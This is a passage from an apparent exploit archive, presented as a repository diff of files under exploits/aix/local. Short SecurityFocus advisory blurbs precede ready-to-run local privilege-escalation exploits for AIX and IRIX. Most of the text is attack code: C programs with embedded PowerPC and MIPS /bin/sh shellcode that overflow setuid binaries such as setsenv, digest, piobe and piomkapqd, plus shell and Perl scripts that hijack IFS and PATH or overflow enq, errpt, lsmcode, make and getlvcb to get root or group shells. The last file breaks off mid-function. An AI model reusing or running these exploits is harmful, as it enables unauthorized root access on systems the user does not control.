#include <sys/types.h>
#include <unistd.h>
#define NUM_ADDRESSES 400
#define BUF_LENGTH 700
#define EXTRA 500
#define OFFSET 0x200
#define GP_OFFSET 31612
#define IRIX_NOP 0x03e0f825 /* move $ra,$ra */
#define u_long unsigned
u_long get_sp_code[] = {
0x03a01025, /* move $v0,$sp */
0x03e00008, /* jr $ra */
0x00000000, /* nop */
};
u_long irix_shellcode[] = {
0x24041234, /* li $4,0x1234 */
0x2084edcc, /* sub $4,0x1234 */
0x0491fffe, /* bgezal $4,pc-4 */
0x03bd302a, /* sgt $6,$sp,$sp */
0x23e4012c, /* addi $4,$31,264+36 */
0xa086feff, /* sb $6,-264+7($4) */
0x2084fef8, /* sub $4,264 */
0x20850110, /* addi $5,$4,264+8 */
0xaca4fef8, /* sw $4,-264($5) */
0xaca6fefc, /* sw $4,-260($5) */
0x20a5fef8, /* sub $5, 264 */
0x240203f3, /* li $v0,1011 */
0x03ffffcc, /* syscall 0xfffff */
0x2f62696e, /* "/bin" */
0x2f7368ff, /* "/sh" */
};
char buf[NUM_ADDRESSES+BUF_LENGTH + EXTRA + 8];
void main(int argc, char **argv)
{
char *env[] = {NULL};
u_long targ_addr, stack, tmp;
u_long *long_p;
int i, code_length = strlen((char *)irix_shellcode)+1;
u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;
stack = get_sp();
if (stack & 0x80000000) {
printf("Recompile with the '-n32' option\n");
exit(1);
}
long_p =(u_long *) buf;
targ_addr = stack + OFFSET;
if (argc > 1)
targ_addr += atoi(argv[1]) * 4;
if (targ_addr + GP_OFFSET > 0x80000000) {
printf("Sorry - this exploit for Irix 6.x only\n");
exit(1);
}
tmp = (targ_addr + NUM_ADDRESSES + (BUF_LENGTH-code_length)/2) & ~3;
while ((tmp & 0xff000000) == 0 ||
(tmp & 0x00ff0000) == 0 ||
(tmp & 0x0000ff00) == 0 ||
(tmp & 0x000000ff) == 0)
tmp += 4;
for (i = 0; i < NUM_ADDRESSES/sizeof(u_long); i++)
*long_p++ = tmp;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = IRIX_NOP;
for (i = 0; i < code_length/sizeof(u_long); i++)
*long_p++ = irix_shellcode[i];
tmp = (targ_addr + GP_OFFSET + NUM_ADDRESSES/2) & ~3;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = (tmp << 16) | (tmp >> 16);
*long_p = 0;
printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);
execle("/usr/lib/desktop/permissions", "permissions",
"-display", getenv("DISPLAY"), "/bin/ls", buf, 0, env);
perror("execl failed");
}

29
exploits/aix/local/19344.sh Executable file
View file

@ -0,0 +1,29 @@
#source: https://www.securityfocus.com/bid/454/info
#
#Under older versions of AIX By changing the IFS enviroment variable to / setuid root programs that use system() or popen() can be fooled into running user provided programs.
#
#!/bin/csh
# IFS hole in AIX3.2 rmail gives egid=mail. Apr. 1994
# Setup needed files.
mkdir /tmp/.rmail
cd /tmp/.rmail
cat << EOF > usr
cp sh mailsh
chmod 2777 mailsh
EOF
chmod 777 usr
ln -s /bin/sh .
# Set PATH, IFS, and run rmail.
setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail joeuser@nohost.com
unsetenv IFS
rm -f usr sh # minor cleanup.
echo "Attempting to run sgid shell."
./mailsh

6
exploits/aix/local/19345.txt Normal file
View file

@ -0,0 +1,6 @@
source: https://www.securityfocus.com/bid/455/info
There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format.
/usr/sbin/lquerypv -h /pathtofilename

7
exploits/aix/local/19354.txt Normal file
View file

@ -0,0 +1,7 @@
source: https://www.securityfocus.com/bid/468/info
The sgihelp program, from SGI and included with IRIX 5.1 and 5.2, contains a vulnerability. sgihelp contains an option that allows a user to print to a command. Certain SGI utilities, including PrintStatus, printers, scanners, and a number of others, will call this program without changing their uid to the users, from roots. As such, arbitrary commands can be executed as root using the 'print to command' option of sgihelp.
Run PrintStatus
Press the 'help' button.
Select the 'print to command' option. This will allow you to execute anything as root.

6
exploits/aix/local/20213.txt Normal file
View file

@ -0,0 +1,6 @@
source: https://www.securityfocus.com/bid/1660/info
A vulnerability exists in versions 4.x. x of AIX, from IBM. Any local user can utilize the -Z command to netstat, without needing to be root. This will cause interface statistics to be reset. This could potentially interfere with programs that track statistical information.
$ netstat -in --> shows stats
$ netstat -Zi --> clears them without checking the uid

6
exploits/aix/local/20290.txt Normal file
View file

@ -0,0 +1,6 @@
source: https://www.securityfocus.com/bid/1800/info
A vulnerability exists in AIX 3.* versions of bugfiler, a utility which automates the process of reporting an filing system bugs. Bugfiler, installed setuid root, creates files in a directory specified by the user invoking the program (example: $/lib/bugfiler -b <user> directory>). It may be possible for an attacker to create files in arbitrary directories that are owned by attacker-specified users. This may result in an elevation of privileges for the attacker. Further technical details about this vulnerability are not known.
$whoami eviluser
$/lib/bugfiler -b <user> <directory> creates funny files under the <user>-owned <directory> and that may be used by crackers to increase privileges. See the manpage of bugfiler for more information. (bugfiler does not work for some <user>s)

80
exploits/aix/local/20452.c Normal file
View file

@ -0,0 +1,80 @@
/*
source: https://www.securityfocus.com/bid/2032/info
AIX is a version of the UNIX Operating System distributed by IBM. A problem exists that could allow a user elevated priviledges.
The problem occurs in the setsenv binary. It has been reported that a buffer overflow exists in this binary which could allow a user to overwrite variables on the stack, including the return address. This makes it possible for a malicious user to execute arbitrary code, and potentially attain a UID of 0.
*/
/*## copyright LAST STAGE OF DELIRIUM sep 2000 poland *://lsd-pl.net/ #*/
/*## /usr/bin/setsenv #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
#define ADRNUM 200
#define NOPNUM 16000
char setreuidcode[]=
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel <setreuidcode> */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xb5\x01\x40" /* cal r21,0x140(r21) */
"\x88\x55\xfe\xe0" /* lbz r2,-288(r21) */
"\x7e\x83\xa3\x78" /* mr r3,r20 */
"\x3a\xd5\xfe\xe4" /* cal r22,-284(r21) */
"\x7e\xc8\x03\xa6" /* mtlr r22 */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"\xff\xff\xff\xff"
"\x38\x75\xff\x04" /* cal r3,-252(r21) */
"\x38\x95\xff\x0c" /* cal r4,-244(r21) */
"\x7e\x85\xa3\x78" /* mr r5,r20 */
"\x90\x75\xff\x0c" /* st r3,-244(r21) */
"\x92\x95\xff\x10" /* st r20,-240(r21) */
"\x88\x55\xfe\xe1" /* lbz r2,-287(r21) */
"\x9a\x95\xff\x0b" /* stb r20,-245(r21) */
"\x4b\xff\xff\xd8" /* bl <setreuidcode+32> */
"/bin/sh"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM sep 2000 poland //lsd-pl.net/\n");
printf("/usr/bin/setsenv for aix 4.1 4.2 4.3 4.3.x PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 41|42|43|433\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 41: memcpy(&setreuidcode[40],"\x68\x03",2); break;
case 42: memcpy(&setreuidcode[40],"\x71\x02",2); break;
case 43: memcpy(&setreuidcode[40],"\x82\x04",2); break;
case 433: memcpy(&setreuidcode[40],"\x92\x03",2); break;
default: exit(-1);
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]=&buffer[1000];
envp[1]=0;
b=buffer;
strcpy(b,"lsd=");b+=4;
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=&buffer[1000];
sprintf(b,"xxx= ");b+=7;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
*b=0;
execle("/usr/bin/setsenv","lsd",buffer,0,envp);
}

88
exploits/aix/local/20453.c Normal file
View file

@ -0,0 +1,88 @@
/*
source: https://www.securityfocus.com/bid/2033/info
AIX is a version of the UNIX Operating System distributed by IBM. A vulnerability exists in the operating system which could allow a user an elevation in priviledge.
The problem occurs in the digest binary. It is reported that it is possible to overflow a buffer in the program and overwrite a pointer to the stack, which in turn can result in an overflow in a library referenced by the binary. The secondary overflow in the library makes it possible to overwrite other stack variables, including the return address.
A malicious user could use this vulnerability to gain an elevation in priviledges, and potentially UID 0.
*/
/*## copyright LAST STAGE OF DELIRIUM dec 2000 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lpd/digest #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
/* printq group to root user's privilages escalation attack */
/* use aix_piomkapqd or aix_piobe codes first in order to gain egid=printq */
#define PCHNUM 2200
#define ADRNUM 8000
#define NOPNUM 8000
#define ALLIGN 2
char setreuidcode[]=
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel <setreuidcode> */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xb5\x01\x40" /* cal r21,0x140(r21) */
"\x88\x55\xfe\xe0" /* lbz r2,-288(r21) */
"\x7e\x83\xa3\x78" /* mr r3,r20 */
"\x3a\xd5\xfe\xe4" /* cal r22,-284(r21) */
"\x7e\xc8\x03\xa6" /* mtlr r22 */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"\xff\xff\xff\xff"
"\x38\x75\xff\x04" /* cal r3,-252(r21) */
"\x38\x95\xff\x0c" /* cal r4,-244(r21) */
"\x7e\x85\xa3\x78" /* mr r5,r20 */
"\x90\x75\xff\x0c" /* st r3,-244(r21) */
"\x92\x95\xff\x10" /* st r20,-240(r21) */
"\x88\x55\xfe\xe1" /* lbz r2,-287(r21) */
"\x9a\x95\xff\x0b" /* stb r20,-245(r21) */
"\x4b\xff\xff\xd8" /* bl <setreuidcode+32> */
"/bin/sh"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],pch[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM dec 2000 poland //lsd-pl.net/\n");
printf("/usr/lib/lpd/digest for aix 4.1 4.2 4.3 PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 41|42|43\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 41: memcpy(&setreuidcode[40],"\x68\x03",2); break;
case 42: memcpy(&setreuidcode[40],"\x71\x02",2); break;
case 43: memcpy(&setreuidcode[40],"\x82\x04",2); break;
default: exit(-1);
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000-2300;
*((unsigned long*)pch)=(unsigned long)e+(i&~3)-2300;
envp[0]=&buffer[3000];
envp[1]=0;
b=buffer;
for(i=0;i<ALLIGN;i++) *b++=' ';
for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
*b=0;
b=&buffer[3000];
sprintf(b,"xxx= ");b+=5;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
execle("/usr/lib/lpd/digest","lsd",buffer,"lsd",0,envp);
}

58
exploits/aix/local/20454.sh Executable file
View file

@ -0,0 +1,58 @@
source: https://www.securityfocus.com/bid/2034/info
AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists that may allow elevation of user priviledges.
The problem occurs in the enq program. It is reported that an overflow exists in the command line argument parsing, which could lead to the overwriting of variables on the stack. This creates the potential for a malicious user to execute arbitrary code, and possibly gain administrative access.
#!/bin/sh
# FileName: ex_enq_aix4x.sh
# Exploit "enq & qstatus" of Aix4.x to get egid=9 shell.
# Usage : chmod ex_enq_aix4x.sh ; ./ex_enq_aix4x.sh
# Tested : on Aix4.3.3
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-4-24
# Announce: use as your owner risk!
PERL=/usr/bin/perl
TMP=/tmp/.env.tmp
SHPL=/tmp/.sh.pl
cat >$SHPL<<EOF
#!/usr/bin/perl
\$BUFF="";
\$BUFF.="\x7c\xa5\x2a\x79"x500;
\$OSLEVEL=\`/usr/bin/oslevel\`;
\$ID="\x04";
if( \$OSLEVEL=~/4\.1/ ) {
\$ID="\x03";
} elsif(\$OSLEVEL=~/4\.3\.3/) {
\$ID="\x03";
} elsif( \$OSLEVEL=~/4\.2/ ) {
\$ID="\x02";
}
\$BUFF.="\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6";
\$BUFF.="\x3b\xff\x01\x20\x38\x7f\xff\x08\x38\x9f\xff\x10";
\$BUFF.="\x90\x7f\xff\x10\x90\xbf\xff\x14\x88\x5f\xff\x0f";
\$BUFF.="\x98\xbf\xff\x0f\x4c\xc6\x33\x42\x44\xff\xff\x02";
\$BUFF.="/bin/sh";
\$BUFF.=\$ID;
print \$BUFF;
EOF
env | awk -F = '{print "unset "$1;}'|grep -v LOGNAME > $TMP
. $TMP
/bin/rm -f $TMP
CC=A`$PERL $SHPL` ; export CC
/bin/rm -f $SHPL
/usr/bin/enq -w"`perl -e 'print "\x2f\xf2\x2b\x10"x600'`"
#EOF

80
exploits/aix/local/20455.c Normal file
View file

@ -0,0 +1,80 @@
/*
source: https://www.securityfocus.com/bid/2037/info
AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists which can allow a local user elevated priviledges.
The problem exists in the piobe program. Due to the insuffient handling of the PIOSTATUSFILE, PIOTITLE, and PIOVARDIR environment variables, it's possible to overwrite stack variables. This makes it possible for a malicious user to pass specially formatted strings to the program via environment variables, and potentially gain administrative access.
*/
/*## copyright LAST STAGE OF DELIRIUM dec 2000 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lpd/piobe #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
/* this code gives privilages of a printq group and command shell (without */
/* a prompt). from that point euid=root can be gained with the use of our */
/* aix_piodmgrsu or aix_digest codes */
#define ADRNUM 3000
#define NOPNUM 16000
char shellcode[]=
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh\xff"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],*b,*envp[4];
int i,align;
printf("copyright LAST STAGE OF DELIRIUM dec 2000 poland //lsd-pl.net/\n");
printf("/usr/lib/lpd/piobe for aix 4.1 4.2 4.3 4.3.x PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 41|42|43|433\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 41: shellcode[55]=0x03;align=2; break;
case 42: shellcode[55]=0x02;align=0; break;
case 43: shellcode[55]=0x04;align=0; break;
case 433: shellcode[55]=0x03;align=0; break;
default: exit(-1);
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]="PIOSTATUSFILE=lsd";
envp[1]=buffer;
envp[2]=&buffer[3500];
envp[3]=0;
b=buffer;
strcpy(b,"PIOVARDIR=");b+=10;
for(i=0;i<align;i++) *b++=' ';
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=&buffer[3500];
sprintf(b,"xxx=");b+=4;
for(i=0;i<3-align;i++) *b++=' ';
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
execle("/usr/lib/lpd/piobe","lsd",0,envp);
}

59
exploits/aix/local/20965.sh Executable file
View file

@ -0,0 +1,59 @@
source: https://www.securityfocus.com/bid/2916/info
AIX ships with a diagnostic reporting utility called 'diagrpt'. This utility is installed setuid root by default.
When 'diagrpt' executes, it relies on an environment variable to locate another utility which it executes. This utility is executed by 'diagrpt' as root.
An attacker can gain root privileges by having 'diagrpt' execute a malicious program of the same name in a directory under their control.
#!/bin/sh
# FileName: x_diagrpt.sh
# Exploit diagrpt of Aix4.x & 5L to get a uid=0 shell.
# Tested : on Aix4.3.3 & Aix5.1.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-23
# Announce: use as your owner risk!
#
# Note :
# It does not work on all versions of tsm command.
# Use this command to test if your version can exploit or not :
# bash$ strings /usr/lpp/diagnostics/bin/diagrpt |grep cat
# diagrpt.cat
# cat %s <--- here ! have the bug !!! can exploit!
#
O_DIR=`/bin/pwd`
cd /tmp ; mkdir .ex$$ ; cd .ex$$
PATH=/tmp/.ex$$:$PATH ; export PATH
/bin/cat >cat<<EOF
#!/bin/ksh -p
cp /bin/ksh ./kfsh
chown root ./kfsh
chmod 777 ./kfsh
chmod u+s ./kfsh
EOF
chmod a+x cat
DIAGDATADIR=/tmp/.ex$$ ; export DIAGDATADIR
touch /tmp/.ex$$/diagrpt1.dat
/usr/lpp/diagnostics/bin/diagrpt -o 010101
stty echo
stty intr '^C' erase '^H' eof '^D' eol '^@'
if [ -e ./kfsh ] ;then
echo ""
echo "===================="
pwd
ls -l ./kfsh
echo "Exploit ok ! Use this command to get a uid=0 shell :"
echo '/usr/bin/syscall setreuid 0 0 \; execve "/bin/sh" '
./kfsh
else
echo ""
echo "Exploit false !!!!"
fi
cd /tmp ; /bin/rm -Rf /tmp/.ex$$ ;cd $O_DIR
#EOF

85
exploits/aix/local/21094.c Normal file
View file

@ -0,0 +1,85 @@
// source: https://www.securityfocus.com/bid/3238/info
//
// The 'piomkapqd' utility is a component of the AIX printing subsystem. By default, it is installed setgid and owned by the 'printk' group.
//
// 'piomkapqd' contains a locally exploitable stack overrun condition in it's handling of command line parameters.
//
// Local users may be able to gain group 'printk' privileges if this vulnerability is exploited. It may be possible to elevate to root from this point by exploiting vulnerabilities in other components of the printing subsystem.
/*## copyright LAST STAGE OF DELIRIUM sep 2000 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lpd/pio/etc/piomkapqd #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
/* this code gives privilages of a printq group. from that point euid=root */
/* can be gained with the use of our aix_piodmgrsu or aix_digest codes */
#define ADRNUM 2000
#define NOPNUM 16000
#define PRINTQ_GID 9
char setregidcode[]=
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel (setregidcode) */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xb5\x01\x40" /* cal r21,0x140(r21) */
"\x88\x55\xfe\xe4" /* lbz r2,-284(r21) */
"\x88\x75\xfe\xe7" /* lbz r3,-281(r21) */
"\x88\x95\xfe\xe6" /* lbz r4,-282(r21) */
"\x3a\xd5\xfe\xe8" /* cal r22,-280(r21) */
"\x7e\xc8\x03\xa6" /* mtlr r22 */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"\xff\xff\xff\x01"
"\x38\x75\xff\x08" /* cal r3,-248(r21) */
"\x38\x95\xff\x10" /* cal r4,-240(r21) */
"\x7e\x85\xa3\x78" /* mr r5,r20 */
"\x90\x75\xff\x10" /* st r3,-240(r21) */
"\x92\x95\xff\x14" /* st r20,-236(r21) */
"\x88\x55\xfe\xe5" /* lbz r2,-283(r21) */
"\x9a\x95\xff\x0f" /* stb r20,-241(r21) */
"\x4b\xff\xff\xd8" /* bl (setregidcode+32) */
"/bin/sh"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM sep 2000 poland //lsd-pl.net/\n");
printf("/usr/lib/lpd/pio/etc/piomkapqd for aix 4.2 4.3 PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 42|43|433\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 42: memcpy(&setregidcode[44],"\xd2\x02",2); break;
case 43: memcpy(&setregidcode[44],"\xe7\x04",2); break;
case 433: memcpy(&setregidcode[44],"\x82\x03",2); break;
default: exit(-1);
}
setregidcode[46]=PRINTQ_GID;
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]=&buffer[3000];
envp[1]=0;
b=buffer;
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=&buffer[3000];
sprintf(b,"xxx=");b+=4;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setregidcode);i++) *b++=setregidcode[i];
*b=0;
execle("/usr/lib/lpd/pio/etc/piomkapqd","lsd","-p",buffer,0,envp);
}

29
exploits/aix/local/21904.pl Executable file
View file

@ -0,0 +1,29 @@
source: https://www.securityfocus.com/bid/5885/info
The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges.
#!/usr/bin/perl
# FileName: x_errpt_aix5.pl
# Exploit command errpt for Aix5L to get a root shell.
# Tested : on Aix5.1
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-4-16
# Announce: use as your owner risk!
$BUFF="A". "\x7c\xa5\x2a\x79"x500;
#shellcode from lsd-pl and modified by watercloud 2003-4 for Aix5L
$BUFF.="\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40";
$BUFF.="\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$BUFF.="\x4c\xc6\x33\x42\x44\xff\xff\x02\xb6\x05\xff\xff\x7e\x94\xa2\x79";
$BUFF.="\x7e\x84\xa3\x78\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40";
$BUFF.="\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$BUFF.="\x4c\xc6\x33\x42\x44\xff\xff\x02\xb7\x05\xff\xff\x38\x75\xff\x04";
$BUFF.="\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10";
$BUFF.="\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
%ENV=(); $ENV{CC}=$BUFF;
exec "/usr/bin/errpt","-T","A"."\x2f\xf2\x2a\x40"x1320;
#EOF

49
exploits/aix/local/22756.pl Executable file
View file

@ -0,0 +1,49 @@
source: https://www.securityfocus.com/bid/7871/info
Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges.
#!/usr/bin/perl
# FileName: x_lsmcode_aix4x.pl
# Exploit lsmcode of Aix4.3.3 to get a uid=0 shell.
# Tested : on Aix4.3.3.Mybe can work on other versions.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-6-1
# Announce: use as your owner risk!
$CMD="/usr/sbin/lsmcode";
$_=`/usr/bin/oslevel`;
$XID="\x03";
$UID="\x97";
print "\n\nExploit $CMD for Aix 4.3.3 to get uid=0 shell.\n";
print "From: [ www.xfocus.org 2003-6-1 ].\n\n";
$NOP="\x7c\xa5\x2a\x79"x800;
%ENV=();
$ENV{CCC}="A" .$NOP.&getshell($XID,$UID);
$ENV{DIAGNOSTICS}="\x2f\xf2\x2a\x2f"x300;
$ret = system $CMD ,"-d","a";
for($i=0;$i<4 && $ret;$i++){
for($j=0;$j<4 && $ret;$j++) {
$ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
$ENV{DIAGNOSTICS}="A"x $j ."\x2f\xf2\x2a\x2f"x300;
$ret = system $CMD ,"-d","a";
}
}
#sub
sub getshell($XID,$GID) {
my $SHELL,($XID,$GID)=@_;
$SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
$SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
$SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
$SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
$SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
$SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
return $SHELL;
}
#EOF

57
exploits/aix/local/23838.pl Executable file
View file

@ -0,0 +1,57 @@
source: https://www.securityfocus.com/bid/9903/info
GNU make for IBM AIX has been reported to be prone to a buffer overflow vulnerability, the issue is reported to exist due to a lack of sufficient boundary checks performed when reading the path to the CC compiler.
Because the GNU make utility is reported to run with setGID root privileges, a local attacker may potentially exploit this condition to gain access to the root group.
This issue is reported to exist on AIX 4.3.3 platforms.
#!/usr/bin/perl
# FileName: x_make_aix433_limited.pl
# Exploit /usr/local/bin/make of Aix4.3.3 to get a gid=0 shell.
# Tested on low version of Aix4.3.3.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org (EN) / www.xfocus.net (CN)
# Date : 2003-5-30
# Announce: use as your owner risk!
$CMD="/usr/local/bin/make";
$_=`/usr/bin/oslevel`;
$XID="\x03";
@GID_LIST=(248,247);
print "\n\nExploit $CMD for Aix 4.3.3 to get gid=0 shell.\n";
print "From: [ www.xfocus.org 2003-5-30 ].\n\n";
print "Note :use this command to get gid=0 after egid=0 :\n";
print "/usr/bin/syscall setregid 0 0 \\; execve '/bin/sh'\n";
$str="k:k.c\n\t\${CC} k.c\n\t";
open mfd,">Makefile" or die "open file Makefile for write error!\n";
open kfd,">k.c" or die "open file .k.c for write error!\n";
print mfd $str, print kfd $str;
close mfd, close kfd;
$NOP="\x7c\xa5\x2a\x79"x800;
%ENV=();
foreach $GID ( @GID_LIST) {
$ENV{CCC}=$NOP.&getshell($XID,chr($GID));
system $CMD ,"CC="."\x2f\xf2\x2b\x40"x300;
}
unlink "Makefile","k.c";
#sub
sub getshell($XID,$GID) {
my $SHELL,($XID,$GID)=@_;
$SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
$SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
$SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
$SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
$SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
$SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
return $SHELL;
}
#EOF

56
exploits/aix/local/23840.pl Executable file
View file

@ -0,0 +1,56 @@
source: https://www.securityfocus.com/bid/9905/info
getlvcb has been reported to be prone to a buffer overflow vulnerability.
When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user.
An attacker will require system group privileges prior to the execution of the getlvcb utility, the attacker may exploit the issue described in BID 9903 in order to gain the necessary privileges required to exploit this vulnerability.
#!/usr/bin/perl
# FileName: x_getlvcb_aix433_limited.pl
# Exploit getlvcb of Aix4.3.3 to get a uid=0 shell from a gid=0.
# Tested : on Aix4.3.3.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-30
# Announce: use as your owner risk!
$CMD="/usr/sbin/getlvcb";
$_=`/usr/bin/oslevel`;
$XID="\x03";
$UID="\x97";
print "\n\nExploit $CMD for Aix 4.3.3 to get uid=0 shell.\n";
print "From: [ www.xfocus.org 2003-5-30 ].\n\n";
print "Note :\n";
print "You must get gid=0 befor use this exploit,for example ";
print "my another program x_make_433_limited.pl :)\n";
print "If you get a shell euid=0 then run this command: ";
print "/usr/bin/syscall setreuid 0 0 \\; execve '/bin/sh'\n";
$NOP="\x7c\xa5\x2a\x79"x800;
%ENV=();
$ENV{CCC}="AA".$NOP.&getshell($XID,$UID);
$ret=system $CMD ,"AAA"."\x2f\xf2\x2b\x40"x300;
for($i=0;$i<4 && $ret;$i++){
for($j=0;$j<4 && $ret;$j++) {
$ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
system $CMD ,"A"x $j ."\x2f\xf2\x2b\x40"x300;
}
}
#sub
sub getshell($XID,$GID) {
